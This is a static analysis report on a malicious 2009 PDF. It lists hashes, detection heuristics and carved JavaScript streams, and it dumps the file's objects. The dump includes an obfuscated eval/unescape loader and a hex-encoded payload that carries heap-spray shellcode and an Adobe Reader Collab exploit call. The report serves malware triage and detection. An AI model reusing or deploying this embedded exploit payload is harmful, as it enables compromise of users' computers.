Malicious PDF — malware analysis report

Static analysis result for SHA-256 db850cc79b55d80a…

MALICIOUS

PDF

7.9 KB Created: 2009-07-13 19:22:54 Authoring application: sOY (via jsi) First seen: 2026-05-08
MD5: 4b4f283cfedc9ef514c906a36b7a64d5 SHA-1: 5c8ec76d60828df96f2119fad6fd8c82115fbcd7 SHA-256: db850cc79b55d80add968d1ce5559f956b87efde8234c2ccdb2622d91dac0a6d
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The JavaScript stream is obfuscated, as evidenced by the PDF_UNESCAPE heuristic firing and the presence of 'unescape()' calls. The obfuscated JavaScript is likely intended to perform malicious actions such as downloading a second-stage payload or exploiting vulnerabilities. The file's authoring application 'jsi' further suggests the use of JavaScript for malicious purposes.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    blow=(this);rho = new Date(2010,11,3);var fits =rho.getHours()+'al';fits = fits.replace(0,'ev');ugc=blow[fits];ggiE='( '+'une';ax='fo;';iouiy=',unescape("%25';hghs='s.in';nbbnb='hghs=thi'+hghs+ax;ax='ape(';hghs=');';zzxcx='place(/(';ugc(nbbnb+'ax=(hghs.fixpdf).re'+zzxcx+'*)/g'+iouiy+'"));ugc'+ggiE+'sc'+ax+'ax)'+hghs)
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x19D 318 bytes
SHA-256: ceecfabe7c97ce3e439a70e274c2e2efb21a3300d9d9e75d5cb1a057b1a80936
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
blow=(this);rho = new Date(2010,11,3);var fits =rho.getHours()+'al';fits = fits.replace(0,'ev');ugc=blow[fits];ggiE='( '+'une';ax='fo;';iouiy=',unescape("%25';hghs='s.in';nbbnb='hghs=thi'+hghs+ax;ax='ape(';hghs=');';zzxcx='place(/(';ugc(nbbnb+'ax=(hghs.fixpdf).re'+zzxcx+'*)/g'+iouiy+'"));ugc'+ggiE+'sc'+ax+'ax)'+hghs)
javascript_obj0006_001.js pdf-javascript-stream PDF /JS object 6 at offset 0x1C5 7685 bytes
SHA-256: 447a5405f70a7a92514b5f841322a9592282099b72c3954650a604cbe3dcd459
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
blow=(this);rho = new Date(2010,11,3);var fits =rho.getHours()+'al';fits = fits.replace(0,'ev');ugc=blow[fits];ggiE='( '+'une';ax='fo;';iouiy=',unescape("%25';hghs='s.in';nbbnb='hghs=thi'+hghs+ax;ax='ape(';hghs=');';zzxcx='place(/(';ugc(nbbnb+'ax=(hghs.fixpdf).re'+zzxcx+'*)/g'+iouiy+'"));ugc'+ggiE+'sc'+ax+'ax)'+hghs)
endstream
endobj 
7 0 obj 
<<
/JS 6 0 R
/S /JavaScript
>>
endobj 
2 0 obj 
<<
/Names [(LpE) 7 0 R]
>>
endobj 
8 0 obj 
<<
/Creator (sOY)
/Title (X8pc)
/Producer (jsi)
/Author (bCN)
/fixpdf  (*77*61*72*66*72*61*67*3D*27*27*3B*66*75*6E*63*74*69*6F*6E*20*67*72*75*6E*74*70*72*69*6E*74*28*77*61*72*64*73*65*6E*74*72*79*2C*73*74*75*6D*70*74*72*61*70*29*7B*72*65*74*75*72*6E*20*77*61*72*64*73*65*6E*74*72*79*2E*72*65*70*6C*61*63*65*28*73*74*75*6D*70*74*72*61*70*2C*77*61*72*66*72*61*67*29*3B*7D*66*75*6E*63*74*69*6F*6E*20*79*65*79*73*6B*61*64*69*28*68*79*70*70*6F*69*6C*6F*6C*7A*29*7B*72*65*74*75*72*6E*20*6E*65*77*20*52*65*67*45*78*70*28*27*5B*27*2B*68*79*70*70*6F*69*6C*6F*6C*7A*2B*27*5D*27*2C*27*67*27*29*3B*7D*66*75*6E*63*74*69*6F*6E*20*63*68*69*6D*7A*64*72*65*61*6D*28*74*6F*74*6F*62*6C*6F*77*2C*70*6F*6C*61*72*65*63*6C*69*70*73*65*29*7B*20*20*66*6F*6F*74*7A*62*6F*6F*6D*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*78*6C*37*65*35*6E*4E*67*31*74*35*68*27*2C*79*65*79*73*6B*61*64*69*28*27*50*35*31*4E*37*78*27*29*29*3B*20*20*77*68*69*6C*65*28*74*6F*74*6F*62*6C*6F*77*5B*66*6F*6F*74*7A*62*6F*6F*6D*5D*2A*32*3C*70*6F*6C*61*72*65*63*6C*69*70*73*65*29*7B*20*20*20*20*74*6F*74*6F*62*6C*6F*77*2B*3D*74*6F*74*6F*62*6C*6F*77*3B*20*20*7D*20*20*74*72*6F*6C*6C*68*75*6E*74*65*72*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*6A*73*53*75*63*62*71*73*4A*74*6D*72*4A*69*6A*6E*53*67*27*2C*79*65*79*73*6B*61*64*69*28*27*71*6A*6D*44*4A*63*53*46*34*27*29*29*3B*20*20*74*6F*74*6F*62*6C*6F*77*3D*74*6F*74*6F*62*6C*6F*77*5B*74*72*6F*6C*6C*68*75*6E*74*65*72*5D*28*30*2C*20*70*6F*6C*61*72*65*63*6C*69*70*73*65*2F*32*29*3B*20*20*72*65*74*75*72*6E*20*74*6F*74*6F*62*6C*6F*77*3B*7D*62*61*74*72*69*64*65*72*3D*6E*65*77*20*41*72*72*61*79*28*29*3B*63*68*69*65*66*74*61*69*6E*3D*33*32*34*38*31*39*32*33*39*2D*31*32*32*37*30*33*31*33*31*3B*73*75*6E*70*61*6C*6C*61*64*69*6E*3D*34*30*31*31*37*36*32*2B*31*38*32*35*34*32*3B*63*6F*69*6C*6E*6F*76*61*3D*75*6E*65*73*63*61*70*65*28*22*25*75*39*30*35*30*25*75*39*30*35*30*25*75*39*30*35*30*25*75*39*30*35*30*25*75*39*30*39*30*25*75*39*30*39*30*25*75*39*30*39*30*25*75*39*30*39*30*25*75*66*62*65*39*25*75*30*30*30*30*25*75*35*66*30*30*25*75*61*31*36*34*25*75*30*30*33*30*25*75*30*30*30*30*25*75*34*30*38*62*25*75*38*62*30*63*25*75*31*63*37*30*25*75*38*62*61*64*25*75*32*30*36*38*25*75*37*64*38*30*25*75*33*33*30*63*25*75*30*33*37*34*25*75*65*62*39*36*25*75*38*62*66*33*25*75*30*38*36*38*25*75*66*37*38*62*25*75*30*34*36*61*25*75*65*38*35*39*25*75*30*30*38*66*25*75*30*30*30*30*25*75*66*39*65*32*25*75*36*66*36*38*25*75*30*30*36*65*25*75*36*38*30*30*25*75*37*32*37*35*25*75*36*64*36*63*25*75*66*66*35*34*25*75*38*62*31*36*25*75*65*38*65*38*25*75*30*30*37*39*25*75*30*30*30*30*25*75*64*37*38*62*25*75*38*30*34*37*25*75*30*30*33*66*25*75*66*61*37*35*25*75*35*37*34*37*25*75*38*30*34*37*25*75*30*30*33*66*25*75*66*61*37*35*25*75*65*66*38*62*25*75*33*33*35*66*25*75*38*31*63*39*25*75*30*34*65*63*25*75*30*30*30*31*25*75*38*62*30*30*25*75*35*31*64*63*25*75*35*33*35*32*25*75*30*34*36*38*25*75*30*30*30*31*25*75*66*66*30*30*25*75*30*63*35*36*25*75*35*39*35*61*25*75*35*32*35*31*25*75*30*32*38*62*25*75*34*33*35*33*25*75*33*62*38*30*25*75*37*35*30*30*25*75*38*31*66*61*25*75*66*63*37*62*25*75*36*35*32*65*25*75*36*35*37*38*25*75*30*33*37*35*25*75*65*62*38*33*25*75*38*39*30*38*25*75*63*37*30*33*25*75*30*34*34*33*25*75*36*35*32*65*25*75*36*35*37*38*25*75*34*33*63*36*25*75*30*30*30*38*25*75*38*61*35*62*25*75*30*34*63*31*25*75*38*38*33*30*25*75*30*30*34*35*25*75*63*30*33*33*25*75*35*30*35*30*25*75*35*37*35*33*25*75*66*66*35*30*25*75*31*30*35*36*25*75*66*38*38*33*25*75*37*35*30*30*25*75*36*61*30*36*25*75*35*33*30*31*25*75*35*36*66*66*25*75*35*61*30*34*25*75*38*33*35*39*25*75*30*34*63*32*25*75*38*30*34*31*25*75*30*30*33*61*25*75*62*34*37*35*25*75*35*36*66*66*25*75*35*31*30*38*25*75*38*62*35*36*25*75*33*63*37*35*25*75*37*34*38*62*25*75*37*38*33*35*25*75*66*35*30*33*25*75*38*62*35*36*25*75*32*30*37*36*25*75*66*35*30*33*25*75*63*39*33*33*25*75*34*31*34*39*25*75*30*33*61*64*25*75*33*33*63*35*25*75*30*66*64*62*25*75*31*30*62*65*25*75*66*32*33*38*25*75*30*38*37*34*25*75*63*62*63*31*25*75*30*33*30*64*25*75*34*30*64*61*25*75*66*31*65*62*25*75*31*66*33*62*25*75*65*37*37*35*25*75*38*62*35*65*25*75*32*34*35*65*25*75*64*64*30*33*25*75*38*62*36*36*25*75*34*62*30*63*25*75*35*65*38*62*25*75*30*33*31*63*25*75*38*62*64*64*25*75*38*62*30*34*25*75*63*35*30*33*25*75*35*65*61*62*25*75*63*33*35*39*25*75*30*30*65*38*25*75*66*66*66*66*25*75*38*65*66*66*25*75*30*65*34*65*25*75*39*38*65*63*25*75*38*61*66*65*25*75*37*65*30*65*25*75*65*32*64*38*25*75*33*33*37*33*25*75*38*61*63*61*25*75*33*36*35*62*25*75*32*66*31*61*25*75*34*61*37*30*25*75*34*35*34*64*25*75*30*30*36*34*25*75*37*34*36*38*25*75*37*30*37*34*25*75*32*46*33*41*25*75*36*32*32*46*25*75*37*30*37*31*25*75*32*45*37*30*25*75*37*33*37*37*25*75*33*35*32*46*25*75*32*46*33*35*25*75*36*46*37*30*25*75*37*34*37*32*25*75*36*43*36*31*25*75*37*37*37*33*25*75*37*30*36*31*25*75*37*30*32*45*25*75*37*30*36*38*25*75*30*30*33*46*25*75*30*30*30*30*25*75*30*30*30*30*22*29*3B*6D*69*6C*6C*69*74*61*72*79*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*70*6C*70*65*44*6E*39*67*77*74*39*68*27*2C*79*65*79*73*6B*61*64*69*28*27*53*39*4C*77*30*70*44*27*29*29*3B*6C*69*63*68*6B*69*6E*67*3D*63*6F*69*6C*6E*6F*76*61*5B*6D*69*6C*6C*69*74*61*72*79*5D*2A*32*3B*6C*61*6D*62*64*61*3D*73*75*6E*70*61*6C*6C*61*64*69*6E*2D*28*6C*69*63*68*6B*69*6E*67*2B*36*33*2D*37*29*3B*70*72*6F*66*66*61*69*72*3D*75*6E*65*73*63*61*70*65*28*27*25*75*39*30*39*30*25*75*39*30*39*30*27*29*3B*70*72*6F*66*66*61*69*72*3D*63*68*69*6D*7A*64*72*65*61*6D*28*70*72*6F*66*66*61*69*72*2C*20*6C*61*6D*62*64*61*29*3B*68*61*77*6B*6E*75*6B*65*3D*28*63*68*69*65*66*74*61*69*6E*2D*32*35*30*32*30*37*35*2B*31*36*39*32*32*32*39*29*2F*73*75*6E*70*61*6C*6C*61*64*69*6E*3B*66*6F*72*28*69*7A*69*70*72*69*6E*74*3D*30*3B*20*69*7A*69*70*72*69*6E*74*3C*68*61*77*6B*6E*75*6B*65*3B*20*69*7A*69*70*72*69*6E*74*2B*2B*29*7B*20*20*62*61*74*72*69*64*65*72*5B*69*7A*69*70*72*69*6E*74*5D*3D*70*72*6F*66*66*61*69*72*2B*63*6F*69*6C*6E*6F*76*61*3B*7D*68*75*6E*74*7A*6F*77*6E*3D*75*6E*65*73*63*61*70*65*28*27*25*75*30*63*30*63*25*75*30*63*30*63*27*29*3B*73*6F*70*62*75*6C*6C*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*70*6C*4C*65*59*6E*4B*67*46*74*4A*68*27*2C*79*65*79*73*6B*61*64*69*28*27*59*4A*52*46*4C*4B*70*27*29*29*3B*77*68*69*6C*65*28*68*75*6E*74*7A*6F*77*6E*5B*73*6F*70*62*75*6C*6C*5D*3C*34*34*39*35*32*29*7B*20*20*68*75*6E*74*7A*6F*77*6E*2B*3D*68*75*6E*74*7A*6F*77*6E*3B*7D*67*65*6C*73*4F*63*61*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*42*63*4C*6F*42*6C*4D*6C*42*61*42*62*4C*53*4D*74*42*6F*4D*72*42*65*27*2C*79*65*79*73*6B*61*64*69*28*27*42*4B*55*4D*4C*27*29*29*3B*70*73*69*6E*69*6C*73*3D*67*72*75*6E*74*70*72*69*6E*74*28*27*32*63*75*6F*57*6C*72*6C*75*65*34*63*32*74*32*45*75*6D*34*61*75*69*56*6C*34*49*34*6E*75*66*7A*6F*27*2C*79*65*79*73*6B*61*64*69*28*27*32*75*34*56*7A*72*57*27*29*29*3B*74*68*69*73*20*5B*67*65*6C*73*4F*63*61*5D*3D*43*6F*6C*6C*61*62*5B*70*73*69*6E*69*6C*73*5D*28*7B*20*20*73*75*62*6A*3A*77*61*72*66*72*61*67*2C*20*6D*73*67*3A*68*75*6E*74*7A*6F*77*6E*7D*29*3B)
/CreationDate (D:20090713192254)
>>
endobj xref
0 9
0000000000 65535 f 
0000000015 00000 n 
0000000742 00000 n 
0000000122 00000 n 
0000000181 00000 n 
0000000287 00000 n 
0000000371 00000 n 
0000000694 00000 n 
0000000786 00000 n 
trailer

<<
/Info 8 0 R
/Root 1 0 R
/Size 9
>>
startxref
7275
%%EOF

Open this report in the interactive analyzer, or submit your own file for analysis.